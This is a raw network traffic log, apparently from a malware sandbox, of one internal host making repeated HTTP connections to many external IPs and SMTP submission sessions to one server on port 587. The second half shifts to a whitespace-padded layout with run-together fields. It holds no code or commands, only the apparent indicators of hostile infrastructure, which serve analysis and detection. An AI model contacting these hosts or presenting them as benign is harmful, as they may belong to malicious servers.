Nov 26, 2024 08:15:43.572499037 CET  50081  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:43.692641973 CET  80     50081  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:43.692661047 CET  80     50081  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:43.975564957 CET  80     50081  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:44.091052055 CET  50081  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:44.237401009 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:44.237447977 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:44.241477966 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:44.241844893 CET  50082  80     192.168.2.10     18.246.231.120
Nov 26, 2024 08:15:44.361835003 CET  80     50082  18.246.231.120   192.168.2.10
Nov 26, 2024 08:15:44.398080111 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:44.518296003 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:44.518472910 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:44.518590927 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:44.518657923 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:44.540184021 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:44.638781071 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:44.638792992 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:44.660161018 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:44.660258055 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:44.660553932 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:44.660553932 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:44.780930996 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:44.780944109 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:46.002470970 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:46.002525091 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:46.002803087 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:46.002872944 CET  50083  80     192.168.2.10     3.254.94.185
Nov 26, 2024 08:15:46.123037100 CET  80     50083  3.254.94.185     192.168.2.10
Nov 26, 2024 08:15:46.152709007 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:46.272970915 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:46.273174047 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:46.278264046 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:46.278384924 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:46.399763107 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:46.399775982 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:46.717103004 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:46.717139959 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:46.717228889 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:46.717582941 CET  50084  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:46.837986946 CET  80     50084  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:47.306807041 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:47.426769972 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:47.426894903 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:47.427215099 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:47.427236080 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:47.549559116 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:47.549578905 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:47.713120937 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:47.720133066 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:47.720369101 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:47.840147972 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:47.840257883 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:48.275439024 CET  80     50085  85.214.228.140   192.168.2.10
Nov 26, 2024 08:15:48.389535904 CET  50085  80     192.168.2.10     85.214.228.140
Nov 26, 2024 08:15:48.427679062 CET  50087  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:48.547647953 CET  80     50087  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:48.547858953 CET  50087  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:48.548155069 CET  50087  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:48.548155069 CET  50087  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:48.668715954 CET  80     50087  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:48.668756962 CET  80     50087  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:48.828164101 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:48.828289032 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:48.828341961 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:48.828388929 CET  50086  80     192.168.2.10     34.211.97.45
Nov 26, 2024 08:15:48.948405027 CET  80     50086  34.211.97.45     192.168.2.10
Nov 26, 2024 08:15:49.405960083 CET  50088  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:49.526063919 CET  80     50088  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:49.526262045 CET  50088  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:49.526561975 CET  50088  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:49.526582003 CET  50088  80     192.168.2.10     47.129.31.212
Nov 26, 2024 08:15:49.598660946 CET  50064  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:15:49.646498919 CET  80     50088  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:49.646522045 CET  80     50088  47.129.31.212    192.168.2.10
Nov 26, 2024 08:15:49.718780041 CET  587    50064  51.195.88.199    192.168.2.10
Nov 26, 2024 08:15:50.007237911 CET  587    50064  51.195.88.199    192.168.2.10
Nov 26, 2024 08:15:50.007781982 CET  50064  587    192.168.2.10     51.195.88.199
Nov 26, 2024 08:15:50.011327982 CET  50089  587    192.168.2.10     51.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.131999016 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.135459900 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606370926 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606463909 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606601000 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.606767893 CET5008780192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.726855040 CET805008747.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.764528990 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.809992075 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.884840965 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885072947 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.885222912 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.930371046 CET805008585.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:50.930433035 CET5008580192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.005141973 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.005158901 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351233959 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.351413965 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.473351955 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.540936947 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541048050 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541095972 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.541209936 CET5008880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.661957979 CET805008847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758491993 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.758690119 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:51.878889084 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.123330116 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.163511038 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.165767908 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.241313934 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.243467093 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246682882 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.246824980 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.285731077 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.285932064 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.335520029 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.335529089 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.339404106 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.339487076 CET5009080192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.361649990 CET5875008951.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.363457918 CET50089587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.366707087 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.366746902 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.406025887 CET5875009251.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.407603979 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.459494114 CET805009034.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.495474100 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.615611076 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.616079092 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.616458893 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.616458893 CET5009380192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.736591101 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:52.736602068 CET805009347.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.403686047 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.403811932 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.403882980 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.404078960 CET5009180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.523987055 CET805009118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669365883 CET5875009251.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.669509888 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.791040897 CET5875009251.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.976300955 CET805008185.214.228.140192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.976512909 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:53.976512909 CET5008180192.168.2.1085.214.228.140
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077558994 CET5875009251.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:54.077864885 CET50092587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.851583004 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.897269964 CET805009834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972330093 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972417116 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972647905 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:58.972702026 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.028209925 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.031182051 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.093193054 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.093205929 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.151300907 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.369208097 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.434681892 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.435132980 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.489774942 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.489886999 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.490206003 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.490281105 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.555290937 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.610259056 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:59.610269070 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.398453951 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.398495913 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.399458885 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.399537086 CET5009980192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.519582033 CET805009934.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.551331997 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.671382904 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.671562910 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.671976089 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.672017097 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.791928053 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:00.791949034 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.563333035 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.563463926 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.563534975 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.563730001 CET5010080192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:01.683692932 CET805010018.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.439970016 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.560131073 CET805010213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.560220003 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.568311930 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.568563938 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.690834999 CET805010213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.690849066 CET805010213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.795696020 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.795713902 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.795774937 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.797689915 CET5010180192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:02.917700052 CET805010118.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.004237890 CET5010380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.124548912 CET805010313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.124627113 CET5010380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.139421940 CET5010380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.139642954 CET5010380192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.259650946 CET805010313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.259674072 CET805010313.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.838402987 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.838661909 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:03.958878040 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.250915051 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.252927065 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.373609066 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.618019104 CET805010213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.618037939 CET805010213.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.618109941 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.632885933 CET5010280192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.655678988 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:04.657116890 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:05.995845079 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.059638023 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.059752941 CET5010580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.066241026 CET5010580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.066257954 CET5010580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.186408997 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.186419964 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.378494978 CET5875009651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:06.481718063 CET50096587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.212944984 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.212960958 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.213094950 CET5010580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.213164091 CET5010580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.333214998 CET805010518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.479110956 CET805010413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.479293108 CET805010413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:07.479357004 CET5010480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.016314030 CET5010480192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.038817883 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.136795044 CET805010413.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.159604073 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.159691095 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.167040110 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.167190075 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.185555935 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.287059069 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.287067890 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.305538893 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.305700064 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.306973934 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.306994915 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.427335978 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:08.427367926 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.465893984 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.465903997 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.466029882 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.466499090 CET5010780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.587419987 CET805010718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.642277002 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.720235109 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.720315933 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.720432997 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.720884085 CET5010680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.762439013 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.762546062 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.763420105 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.763473034 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.840995073 CET805010618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.872823000 CET5003780192.168.2.10208.100.26.245
